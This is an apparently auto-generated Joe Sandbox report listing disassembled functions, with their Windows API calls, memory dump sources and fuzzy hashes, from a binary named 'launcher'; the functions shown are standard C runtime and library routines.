Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c982f06f546ca17d1160d2f99545d1bb4e613c5d7ab603abf256e50f260abdfd
Instruction ID: 66af7f5125afab38be4561f80a0a62fbe55d699ce534761b1250a3dd803e9bb4
Opcode Fuzzy Hash: c982f06f546ca17d1160d2f99545d1bb4e613c5d7ab603abf256e50f260abdfd
Instruction Fuzzy Hash: 9F01F133210214AF9B168E68ECA0D2673FAFBC0760B254464F900DB2D4DF71DA02A7A4

Function 00B3CB32 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: 43bb14ff3a086353fd2c84d9b2d589215cda53863f54125492c148edc7b03693
Instruction ID: 56c93f739a57e5b2d28e1778584be4a8e02f82d818fa9b3d84325903a0699c57
Opcode Fuzzy Hash: 43bb14ff3a086353fd2c84d9b2d589215cda53863f54125492c148edc7b03693
Instruction Fuzzy Hash: 8601217660829A4ECB059BB8B9666A8BFD0FF95338F7451EFD011A4581DB229814C340

Function 00B37770 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Concurrency::details::_Release_chore.LIBCPMT ref: 00B377C6

Part of subcall function 00B3AF64: CloseThreadpoolWork.KERNEL32(?,00000000,?,00B378DA,00000000), ref: 00B3AF72

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
String ID:
API String ID: 312417170-0
Opcode ID: 79504ee61f7d3a9e0a9a7ba55e4129449a1b89de8ec13407517df4048dfc33aa
Instruction ID: d859882e4148f16dc21a749a32cff83e51226266efe5f656d6e30afdc8e7391e
Opcode Fuzzy Hash: 79504ee61f7d3a9e0a9a7ba55e4129449a1b89de8ec13407517df4048dfc33aa
Instruction Fuzzy Hash: A9014BB1C006599BDB04EF94DC4679EBBB4FB44720F104279E81967350E379AA45CBD2

Function 00B4BF11 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00B4DF35,?,?,00B4DF35,00000220,?,00000000,?), ref: 00B4BF43

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ce6fb8427fdc364db587dfb81748dfca8dfad76ad8b1dbab9d1ee585e0865d68
Instruction ID: 2452f30b40c64f98d69c5606455de5b5e4671ba01a1ad9b320f4d51abfb0d218
Opcode Fuzzy Hash: ce6fb8427fdc364db587dfb81748dfca8dfad76ad8b1dbab9d1ee585e0865d68
Instruction Fuzzy Hash: FEE06D3260562167DA212E669C80F9A3AC8DF51BA0F1501E1EE5D961D1DF60EE04F9A1

Function 00B398F0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00B3990F

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 0e76b538840cf788739f3350b52a5f4e6586e53a349fec0387068d90d762a0df
Instruction ID: c9d52001ccd5fa1c4cf581160c1b2f9c31a42077982ef4bcbadd923335424819
Opcode Fuzzy Hash: 0e76b538840cf788739f3350b52a5f4e6586e53a349fec0387068d90d762a0df
Instruction Fuzzy Hash: 88D0A73A7014244F47147B28A814C2E73E1FFC872036605D9E940D7385CB78DC4287C0

Non-executed Functions

Function 00B57792 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00B579A9

Strings

1#QNAN, xrefs: 00B578A5
1#SNAN, xrefs: 00B5789E
1#IND, xrefs: 00B57897
1#INF, xrefs: 00B578C8

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: d597026d64178115ba34871ab3e2e92a4be47266d3f6e25069f0525ab6ef3d83
Instruction ID: f5ce8b4d797b140f43c7d89b9b7924d5c739162f9eaa03d9ec97d11568ad5f0e
Opcode Fuzzy Hash: d597026d64178115ba34871ab3e2e92a4be47266d3f6e25069f0525ab6ef3d83
Instruction Fuzzy Hash: AAD21B71E082298FDB65CE28DD847EAB7F5EB44306F1445EAD80DE7240DB74AE898F41

Function 00B51A07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00B513BD,00000002,00000000,?,?,?,00B513BD,?,00000000), ref: 00B51AA0
GetLocaleInfoW.KERNEL32(?,20001004,00B513BD,00000002,00000000,?,?,?,00B513BD,?,00000000), ref: 00B51AC9
GetACP.KERNEL32(?,?,00B513BD,?,00000000), ref: 00B51ADE

Strings

ACP, xrefs: 00B51A25
OCP, xrefs: 00B51A5B

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 352f58e4e389ecb572784936529ad9285c671a974b412442fdf3d36024a67cdf
Instruction ID: 5e54b3adad96517b9f4f3e6488407dc38713b4df91bd3b10aa2476480e81931b
Opcode Fuzzy Hash: 352f58e4e389ecb572784936529ad9285c671a974b412442fdf3d36024a67cdf
Instruction Fuzzy Hash: FE21B822B02500A6EB36CF6CC940B9773E6EB54B56B568DE4ED29D7100F731DD48C750

Function 00B51287 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B4C16A: GetLastError.KERNEL32(?,?,00B45495,00B68E38,0000000C), ref: 00B4C16E
Part of subcall function 00B4C16A: SetLastError.KERNEL32(00000000), ref: 00B4C210

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00B5138F
IsValidCodePage.KERNEL32(00000000), ref: 00B513CD
IsValidLocale.KERNEL32(?,00000001), ref: 00B513E0
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00B51428
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00B51443

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 29375aee5192ff7e4a5ba96a043e87e7f2487672b886b7133d86718bbf33945f
Instruction ID: 51678eee6a2a65823d93c422275e2951c78a2f25173158a9ab171227fa4d9bb6
Opcode Fuzzy Hash: 29375aee5192ff7e4a5ba96a043e87e7f2487672b886b7133d86718bbf33945f
Instruction Fuzzy Hash: BD514071A01205ABDB10EFA9CC85BBE77F8EF05702F1448E5ED11E7190EBB09A49CB60

Function 00B49CC0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
Instruction ID: 7f3aa85cce84495707ade0f7895ee15ccdfc14cc5c853e48274a91cae678079b
Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
Instruction Fuzzy Hash: 34022A71E012199BDF14CFA9C8806AEBBF1FF48314F2482A9E519E7380D731AE45DB91

Function 00B51FE9 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B520D9

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 103117e866eb2124330f0a2e0b95375241c0eb6021c839498271a79d28accd36
Instruction ID: 012134d2f2a79e83dbda4ae95039f8270737a0607de7ce001e1d2444256cdbda
Opcode Fuzzy Hash: 103117e866eb2124330f0a2e0b95375241c0eb6021c839498271a79d28accd36
Instruction Fuzzy Hash: D07103719061199FDF21AF38DC89BFAB7F9EB06301F1841D9E948A3251DB318E889F10

Function 00B3F8E9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00B3F8F5
IsDebuggerPresent.KERNEL32 ref: 00B3F9C1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B3F9DA
UnhandledExceptionFilter.KERNEL32(?), ref: 00B3F9E4

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3b784e496684c8ec3bd704d5255015c8289632867b80adfd4c87131c123ecd5b
Instruction ID: 6cf823f89a26f0638e46ac0b11ff3bb3c609440a4e6cc9db6c053ec7eddfb8ba
Opcode Fuzzy Hash: 3b784e496684c8ec3bd704d5255015c8289632867b80adfd4c87131c123ecd5b
Instruction Fuzzy Hash: CB31F675D01219EBDB21DFA4D9497CDBBF8AF08300F1041EAE40CAB290EB759A848F45

Function 00B51580 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00B4C16A: GetLastError.KERNEL32(?,?,00B45495,00B68E38,0000000C), ref: 00B4C16E
Part of subcall function 00B4C16A: SetLastError.KERNEL32(00000000), ref: 00B4C210

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B515D4
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B5161E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B516E4

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 381cc4e72965ffe8c66c0b57b5467f366060dffb8dceb1f61a5bdb245ea0bc0c
Instruction ID: ba71eab0f9fb1f3fb042276a5fba2d8df53f29d0b007559dfd3837567f01fa4f
Opcode Fuzzy Hash: 381cc4e72965ffe8c66c0b57b5467f366060dffb8dceb1f61a5bdb245ea0bc0c
Instruction Fuzzy Hash: 53616CB16001179BDB289F2CC982BBA77E8EF08702F1485F9ED05C6185EB74DD99DB50

Function 00B47E30 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B47F28
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B47F32
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00B47F3F

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: fa38e393e93ca77e70e15e444532752128c211513c5756c0b354d99edc2fb30f
Instruction ID: 8b60348e568ca25642bbae2d9e36dd348453ed4e8314efe6d0b62413d48e3087
Opcode Fuzzy Hash: fa38e393e93ca77e70e15e444532752128c211513c5756c0b354d99edc2fb30f
Instruction Fuzzy Hash: 6F31D374901219ABCB21DF64DC89B8DBBF8BF08310F5041EAE40CA7291EB749F859F45

Function 00B400B4 Relevance: 3.0, APIs: 2, Instructions: 27timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32 ref: 00B400EC
GetSystemTimeAsFileTime.KERNEL32(?,DA36A356,00B38E30,?,00B5BE77,000000FF,?,00B3FDB4,?,00000000,00000000,?,00B3FDD8,?,00B38E30,?), ref: 00B400F0

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Time$FileSystem$Precise
String ID:
API String ID: 743729956-0
Opcode ID: 466ef48069f76604a8d03e512d42882b9fec2988116a3af8dcd232e0639b3853
Instruction ID: 5d3842aaa45c95541b64b6c0680856276c387a76c5454d459c8765a0cffeb2ba
Opcode Fuzzy Hash: 466ef48069f76604a8d03e512d42882b9fec2988116a3af8dcd232e0639b3853
Instruction Fuzzy Hash: F0F03032A45698EBC7019F54DC41F6ABBA8F708B50F04456AED12937D0DBB969009A90

Function 00B55C5E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B55BB9,?,?,00000008,?,?,00B5BCAB,00000000), ref: 00B55E8B

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 204b99d9b1ae1fd07225d466c7f340d416d3c7325d00ce7b35715175b3b79688
Instruction ID: 3a847ec5c936ba5a2b969410523a87e86c23015d0ce166abbe6d1718359ca575
Opcode Fuzzy Hash: 204b99d9b1ae1fd07225d466c7f340d416d3c7325d00ce7b35715175b3b79688
Instruction Fuzzy Hash: CDB13B32110A089FD725CF28C49AB657BE0FF45366F2986D8E899CF2A1C735E985CB40

Function 00B3F555 Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B3F56B

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 44abf420cf94e1d8597333bc41c55f3918fe144d016d55c4559496ceaf1a1e53
Instruction ID: 7333181d502fb67bfc2bfcd79e0d577eff21e6cb4b1dea891c1dab8bfe352efe
Opcode Fuzzy Hash: 44abf420cf94e1d8597333bc41c55f3918fe144d016d55c4559496ceaf1a1e53
Instruction Fuzzy Hash: 25A15BB2D01606CFDB18CF59D881BA9BBF5FB48364F24856AD411EB3A4D7B89980CF50

Function 00B51F38 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4D2B4: HeapAlloc.KERNEL32(00000008,?,?,?,00B4C1B7,00000001,00000364,?,00000006,000000FF,?,00B45495,00B68E38,0000000C), ref: 00B4D2F5

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B520D9
FindNextFileW.KERNEL32(00000000,?), ref: 00B521CD
FindClose.KERNEL32(00000000), ref: 00B5220C
FindClose.KERNEL32(00000000), ref: 00B5223F

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
